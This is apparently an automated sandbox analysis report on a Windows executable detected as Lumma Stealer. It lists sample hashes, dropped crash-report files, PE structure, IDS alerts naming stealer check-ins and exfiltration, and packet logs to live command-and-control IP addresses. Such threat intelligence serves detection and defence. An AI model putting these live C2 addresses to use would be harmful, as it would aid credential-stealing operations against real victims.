• 104.21.36.201
• 52.217.75.84
file.exe | Get hash | malicious | LummaC | Browse
• 185.166.143.49
• 104.21.36.201
• 52.217.75.84
acronis recovery expert deluxe 1.0.0.132.rarl.exe | Get hash | malicious | LummaC | Browse
• 185.166.143.49
• 104.21.36.201
• 52.217.75.84
FBmz85HS0d.exe | Get hash | malicious | LummaC | Browse
• 185.166.143.49
• 104.21.36.201
• 52.217.75.84
BJQizQ6sqT.exe | Get hash | malicious | LummaC | Browse
• 185.166.143.49
• 104.21.36.201
• 52.217.75.84
2ZsJ2iP8Q2.exe | Get hash | malicious | LummaC | Browse
• 185.166.143.49
• 104.21.36.201
• 52.217.75.84
LopCYSStr3.exe | Get hash | malicious | LummaC | Browse
• 185.166.143.49
• 104.21.36.201
• 52.217.75.84
LNn56KMkEE.exe | Get hash | malicious | LummaC | Browse
• 185.166.143.49
• 104.21.36.201
• 52.217.75.84
VBHyEN96Pw.exe | Get hash | malicious | LummaC | Browse
• 185.166.143.49
• 104.21.36.201
• 52.217.75.84
                                                                                                                                          No context
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):65536
                                                                                                                                          Entropy (8bit):1.0424090087527706
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:Oc8Eml0BU/HafjudxXOfzuiFXZ24IO825:6EmGBU/wjzzuiFXY4IO8Q
                                                                                                                                          MD5:F10F15F04BD49877438FBB30FAD2937E
                                                                                                                                          SHA1:0E43B061E0385C64FC69FEA5CC08BA9008C64D79
                                                                                                                                          SHA-256:D54561672711C3211491F61FE078D144FC7E09224491DA028DF18CA6B3508BDB
                                                                                                                                          SHA-512:B7406B71BE891B5804051499AFE105E0B8BD6F6AA2CF8B3670D451C0B4C970675891EEC3DAA1809751B538D8C16CF221E38A6F08728CEBFCDC953EB826B9840A
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:low
Preview:..Version=1..EventType=APPCRASH..EventTime=133794444852798867..ReportType=2..Consent=1..UploadTime=133794444863267686..ReportStatus=524384..ReportIdentifier=b1cf8786-64a9-40b3-94f7-a647c6153908..IntegratorReportIdentifier=14d59828-c59f-4dd3-9e24-0c69826f483f..Wow64Host=34404..Wow64Guest=332..NsAppName=OtHVIQ2ge4.exe..AppSessionGuid=00001e98-0001-0014-44e5-0fa35655db01..TargetAppId=W:0006ce09943ef52624939e1be32f36983f160000ffff!0000386655601ba905a637b7a8a37d031f087fd66f3c!OtHVIQ2ge4.exe..TargetApp
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 16:21:25 2024, 0x1205a4 type
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):280510
                                                                                                                                          Entropy (8bit):1.5320720348519863
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:667BBZ5U+KpVoxr5Vu8GliVh2XVQwx+8damD5Ufgo:6xh2/o8Gly1wQeaI5UfP
                                                                                                                                          MD5:FC931CDFFE7FB7D712CEB0853F87C233
                                                                                                                                          SHA1:25529F7D43190F53D012B86099199B6CB0717216
                                                                                                                                          SHA-256:8C2C312F17543AA9DA9D0F38289BAC69C00244C2BBE94DC7A569B007B90AA559
                                                                                                                                          SHA-512:08BA1D78718DB29BDF942A6FCF484063FC3C9129F8FF8BD4B0F8C7C11A2632B28938E5E3183D4A1926A91D931B1E7CC930A8C3169E6864FFBD91DF06059B7131
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8382
                                                                                                                                          Entropy (8bit):3.706842208177272
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:R6l7wVeJ2i6R6YcDPSUlgmfPRprL89bPzsfH2Fm:R6lXJL6R6YoSUlgmfPAPYfl
                                                                                                                                          MD5:48E0F0A878DAC2BA371CEB5BAEB3786D
                                                                                                                                          SHA1:93BD7BEA4DF0BD2B83BE0648B205C652BDD9A66D
                                                                                                                                          SHA-256:A910C1D79C4A73464489E27E4CA396AD46AFB1BD0969F6203D7CA9FBB68F0D14
                                                                                                                                          SHA-512:8C86522D5BE2F7A4B02DDB7E7206B15CFE8D46C273278D2CABD9D1255E676EF45F670E01FEFCCA4E5A22780193506462A22032AE9F33AD95C843ED244AEBA3A7
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
Preview:..<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>7832</Pi
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4624
                                                                                                                                          Entropy (8bit):4.5075730856693985
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:cvIwWl8zsdJg77aI9M3WpW8VYeb0Ym8M4JRKLBFj+q8f67EiVzHBRd:uIjf3I7mG7VzNJcPHEiVzHBRd
                                                                                                                                          MD5:9C28B5B734B5BA8D84DAEA429C6FF6ED
                                                                                                                                          SHA1:CF0C00033A30CA3C3D751D5FC95A7240E5681545
                                                                                                                                          SHA-256:AD53F4AB45E654E518C1758002279B7347E26CA7A0A805DC2AC17053D95D2F04
                                                                                                                                          SHA-512:39B13D4C1921A57D65B50A040D5F9D4F38BEE45D4CD710E069A0ACF2E91F65C4C41219612271632018307A28B4A17E880E9C8C2A39325A0D2F1FEC8D98E203B0
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="644124" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1835008
                                                                                                                                          Entropy (8bit):4.3937960790467745
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:Gl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNAEOBSqa:G4vF0MYQUMM6VFYSEU
                                                                                                                                          MD5:1365A8216351BC58A029AD7439095C2B
                                                                                                                                          SHA1:E6BB90851C3AE93EED50A5FBBF974B2C1D7D91A2
                                                                                                                                          SHA-256:E44EB70CEFAE0F54FF07611EC4E7EA50A313861F733B6BF4C926F78E34E695B8
                                                                                                                                          SHA-512:AB044794135052E58070B849BA58A01D3E530E1DCC0271ED4009878FC5B4B973B8F0F23EEFE229E3DF930D8E0C8C302A46C83CD705E7C7E2A2396CB13D929B5D
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):6.573688666056447
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:OtHVIQ2ge4.exe
                                                                                                                                          File size:2'976'256 bytes
                                                                                                                                          MD5:4ba0641b1f9224605df854c9baaa5dcf
                                                                                                                                          SHA1:386655601ba905a637b7a8a37d031f087fd66f3c
                                                                                                                                          SHA256:7cadf23c992d86cba2587cdf6ddccc39a0d72deb6eef34eb64aae0c097e2f54a
                                                                                                                                          SHA512:597c5e6d8d3b8de0620cccaf01bd5bdd58a07a5f85c14400441246e384a2b9a88fd262ab647160a962c20522339210cdfb32373a6e52567c1d1078d9731b8c1b
                                                                                                                                          SSDEEP:49152:vxtbktPjGVeVCBUiaGHIepN2xmOn3b4jrWmc:pBktPjVCWZGHIepN2xmO3b4j
                                                                                                                                          TLSH:C0D54B62B64576CFD88A23748427CD42795D83FA0B20DDD3DC6DA87A7D63CC12ABAC14
                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................@0...........@..........................p0......~-...@.................................T0..h..
                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                          Entrypoint:0x704000
                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:6
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:6
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:6
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                          Instruction
                                                                                                                                          jmp 00007FF62933F3CAh
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x53054          0x68          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x531f8          0x8           .idata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type             Entropy             Characteristics
          0x1000           0x51000       0x24800   731d7b33384d23e6914faaeba26e169e  False     0.9973512414383562   data                  7.983564281596194   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     0x52000          0x1000        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty                 0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata    0x53000          0x1000        0x200     19a29171433eeef17e42fd663f137134  False     0.14453125           data                  0.9996515881509258  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
hmbcuswq  0x54000          0x2af000      0x2aea00  851bcd3e69c828e66e094ffa0f86bef2  unknown   unknown              unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jagdmkfn  0x303000         0x1000        0x400     b1a5da664f0a3a616c3c93abef190129  False     0.8115234375         data                  6.29782700818507    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant  0x304000         0x3000        0x2200    161fb7f82da3621cb174b063876f5ba7  False     0.05422794117647059  DOS executable (COM)  0.5713453059777756  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL           Import
kernel32.dll  lstrcpy
Timestamp                         SID      Signature                                                                         Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-23T17:20:56.264024+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                         3         192.168.2.9  49717        104.21.36.201   443        TCP
2024-12-23T17:20:56.994147+0100   2049836  ET MALWARE Lumma Stealer Related Activity                                         1         192.168.2.9  49717        104.21.36.201   443        TCP
2024-12-23T17:20:56.994147+0100   2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                         1         192.168.2.9  49717        104.21.36.201   443        TCP
2024-12-23T17:20:58.221530+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                         3         192.168.2.9  49723        104.21.36.201   443        TCP
2024-12-23T17:20:59.644133+0100   2049812  ET MALWARE Lumma Stealer Related Activity M2                                      1         192.168.2.9  49723        104.21.36.201   443        TCP
2024-12-23T17:20:59.644133+0100   2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                         1         192.168.2.9  49723        104.21.36.201   443        TCP
2024-12-23T17:21:01.343367+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                         3         192.168.2.9  49729        104.21.36.201   443        TCP
2024-12-23T17:21:02.342460+0100   2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration                             1         192.168.2.9  49729        104.21.36.201   443        TCP
2024-12-23T17:21:03.705955+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                         3         192.168.2.9  49735        104.21.36.201   443        TCP
2024-12-23T17:21:06.471599+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                         3         192.168.2.9  49741        104.21.36.201   443        TCP
2024-12-23T17:21:08.970444+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                         3         192.168.2.9  49747        104.21.36.201   443        TCP
2024-12-23T17:21:11.861870+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                         3         192.168.2.9  49759        104.21.36.201   443        TCP
2024-12-23T17:21:11.866061+0100   2843864  ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2    1         192.168.2.9  49759        104.21.36.201   443        TCP
2024-12-23T17:21:17.048269+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                         3         192.168.2.9  49770        104.21.36.201   443        TCP
2024-12-23T17:21:17.805059+0100   2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                         1         192.168.2.9  49770        104.21.36.201   443        TCP
2024-12-23T17:21:19.529477+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                         3         192.168.2.9  49776        185.166.143.49  443        TCP
2024-12-23T17:21:22.009924+0100   2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                         3         192.168.2.9  49783        52.217.75.84    443        TCP
                                                                                                                                          Dec 23, 2024 17:20:59.765758038 CET49723443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:20:59.836550951 CET44349723104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:20:59.838583946 CET44349723104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:20:59.838634014 CET49723443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:20:59.838660955 CET44349723104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:20:59.846483946 CET44349723104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:20:59.846564054 CET49723443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:20:59.846765041 CET49723443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:20:59.846765041 CET49723443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:20:59.846784115 CET44349723104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:20:59.846793890 CET44349723104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:00.127456903 CET49729443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:00.127513885 CET44349729104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:00.127588987 CET49729443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:00.128005981 CET49729443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:00.128021955 CET44349729104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:01.343288898 CET44349729104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:01.343367100 CET49729443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:01.345084906 CET49729443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:01.345108032 CET44349729104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:01.345396996 CET44349729104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:01.346731901 CET49729443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:01.346893072 CET49729443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:01.346925974 CET44349729104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:02.342461109 CET44349729104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:02.342564106 CET44349729104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:02.342704058 CET49729443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:02.343106985 CET49729443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:02.343149900 CET44349729104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:02.486648083 CET49735443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:02.486687899 CET44349735104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:02.486788988 CET49735443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:02.487082005 CET49735443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:02.487092018 CET44349735104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:03.705741882 CET44349735104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:03.705955029 CET49735443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:03.707216978 CET49735443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:03.707231045 CET44349735104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:03.707479954 CET44349735104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:03.708647966 CET49735443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:03.708746910 CET49735443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:03.708777905 CET44349735104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:03.708870888 CET49735443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:03.755342960 CET44349735104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:04.685686111 CET44349735104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:04.685777903 CET44349735104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:04.685964108 CET49735443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:04.686120987 CET49735443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:04.686132908 CET44349735104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:05.258955002 CET49741443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:05.259001970 CET44349741104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:05.259099007 CET49741443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:05.259406090 CET49741443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:05.259416103 CET44349741104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:06.471461058 CET44349741104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:06.471599102 CET49741443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:06.472996950 CET49741443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:06.473007917 CET44349741104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:06.473237038 CET44349741104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:06.479644060 CET49741443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:06.479770899 CET49741443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:06.479794979 CET44349741104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:06.479876995 CET49741443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:06.479885101 CET44349741104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:07.428622007 CET44349741104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:07.428742886 CET44349741104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:07.428813934 CET49741443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:07.428980112 CET49741443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:07.428997040 CET44349741104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:07.755614996 CET49747443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:07.755650043 CET44349747104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:07.755743980 CET49747443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:07.756170034 CET49747443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:07.756182909 CET44349747104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:08.970351934 CET44349747104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:08.970443964 CET49747443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:08.973412991 CET49747443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:08.973423004 CET44349747104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:08.973663092 CET44349747104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:08.975194931 CET49747443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:08.975389957 CET49747443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:08.975394011 CET44349747104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:10.049918890 CET44349747104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:10.050009966 CET44349747104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:10.050052881 CET49747443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:10.050193071 CET49747443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:10.050206900 CET44349747104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:10.624277115 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:10.624321938 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:10.624398947 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:10.625049114 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:10.625075102 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.861776114 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.861870050 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.863336086 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.863344908 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.863584042 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.864813089 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.865539074 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.865582943 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.865767002 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.865812063 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.865897894 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.865945101 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.866041899 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.866075039 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.866187096 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.866214037 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.866453886 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.866483927 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.866496086 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.866611958 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.866642952 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.911329031 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.911495924 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.911536932 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.911547899 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.959327936 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:11.959683895 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.959729910 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:11.959762096 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:12.007323027 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:12.007507086 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:12.055334091 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:12.227013111 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:15.796673059 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:15.796768904 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:15.796855927 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:15.797056913 CET49759443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:15.797077894 CET44349759104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:15.832695961 CET49770443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:15.832762957 CET44349770104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:15.832825899 CET49770443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:15.833214998 CET49770443192.168.2.9104.21.36.201
                                                                                                                                          Dec 23, 2024 17:21:15.833229065 CET44349770104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:17.048181057 CET44349770104.21.36.201192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.457140923 CET49783443192.168.2.952.217.75.84
